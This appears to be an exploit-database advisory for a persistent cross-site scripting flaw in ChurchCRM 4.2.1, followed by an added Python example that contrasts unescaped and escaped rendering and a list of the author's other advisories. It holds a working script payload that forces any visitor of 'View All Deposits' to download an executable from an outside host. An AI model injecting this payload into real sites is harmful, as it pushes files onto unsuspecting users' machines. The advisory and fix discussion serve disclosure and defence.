Author
"Mufaddal Masalawala"
Platform
multiple
Release date
2020-12-02
#Exploit Title: ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)
#Date: 2020-10-29
#Exploit Author: Mufaddal Masalawala
#Vendor Homepage: https://churchcrm.io/
#Software Link: https://github.com/ChurchCRM/CRM
#Version: 4.2.1
#Tested on: Kali Linux 2020.3
#Proof Of Concept:
ChurchCRM allows stored XSS via the 'Add New Deposit' module: the value entered in the 'Deposit Comment' field is saved and rendered unescaped whenever the 'View All Deposits' page is visited. There are multiple other locations in the application where this can be replicated.

To exploit this vulnerability:
1. Log in to the application and go to the 'View All Deposits' module.
2. Enter the following payload in the 'Deposit Comment' field and click "Add New Deposit":
   <script>var link = document.createElement('a'); link.href = 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe'; link.download = ''; document.body.appendChild(link); link.click();</script>
3. The payload executes for any user who loads 'View All Deposits', and a .exe file is downloaded to their machine.
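As an added example that is not part of the advisory or of ChurchCRM's own code: a small Python model of the 'Deposit Comment' round trip. `render_deposits_vulnerable` is a hypothetical stand-in for the unescaped rendering the advisory describes, `render_deposits_fixed` is the same view with HTML entity encoding applied at output, and `classify_comment_rendering` is the check a tester would run on the fetched 'View All Deposits' HTML to tell a live payload from an escaped one. The payload URL `http://example.invalid/putty.exe`, the table markup and the sample comments are constructed for the example.

```python
import html

# Constructed payload with the same shape as the advisory's; the URL is hypothetical.
PAYLOAD = (
    "<script>var link = document.createElement('a');"
    " link.href = 'http://example.invalid/putty.exe';"
    " link.download = ''; document.body.appendChild(link); link.click();</script>"
)


def render_deposits_vulnerable(comments):
    """Hypothetical stand-in for the vulnerable view: each stored comment is
    interpolated into the page as-is, so any tags in it become live markup."""
    rows = "".join(f"<tr><td>{comment}</td></tr>" for comment in comments)
    return f'<table id="deposits">{rows}</table>'


def render_deposits_fixed(comments):
    """Same view with output encoding for the HTML body context: html.escape
    turns & < > " ' into entities, so the browser displays the comment as
    text and never builds a <script> element from it."""
    rows = "".join(
        f"<tr><td>{html.escape(comment, quote=True)}</td></tr>" for comment in comments
    )
    return f'<table id="deposits">{rows}</table>'


def classify_comment_rendering(page_html, payload):
    """Tester-side check on the fetched 'View All Deposits' HTML.

    Returns "executable" if the payload appears verbatim (the browser will
    parse it as a script element), "escaped" if only its entity-encoded
    form is present, and "absent" if neither is found.
    """
    if payload in page_html:
        return "executable"
    if html.escape(payload, quote=True) in page_html:
        return "escaped"
    return "absent"


if __name__ == "__main__":
    stored = ["Sunday offering", PAYLOAD]  # constructed deposit comments
    for name, view in (("vulnerable", render_deposits_vulnerable),
                       ("fixed", render_deposits_fixed)):
        print(name, "->", classify_comment_rendering(view(stored), PAYLOAD))
```

Two caveats a practitioner would want: `html.escape` is only correct when the comment lands in HTML body or attribute text; a comment echoed into a JavaScript string or a URL needs the encoder for that context instead. And the reason visiting the page is enough to drop a file is `link.download = ''`, which tells the browser to save the target rather than navigate to it; a Content-Security-Policy without `unsafe-inline` would block the injected inline script as defence in depth, but output encoding is the actual fix.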
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2020-12-02 | "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" | webapps | php | "Mufaddal Masalawala" |
2020-12-02 | "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" | webapps | multiple | "Mufaddal Masalawala" |
2020-12-02 | "ChurchCRM 4.2.0 - CSV/Formula Injection" | webapps | multiple | "Mufaddal Masalawala" |
2020-12-02 | "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" | webapps | php | "Mufaddal Masalawala" |
2020-12-01 | "Tendenci 12.3.1 - CSV/ Formula Injection" | webapps | multiple | "Mufaddal Masalawala" |
2020-11-10 | "Anuko Time Tracker 1.19.23.5325 - CSV/Formula Injection" | webapps | php | "Mufaddal Masalawala" |
2020-09-07 | "grocy 2.7.1 - Persistent Cross-Site Scripting" | webapps | php | "Mufaddal Masalawala" |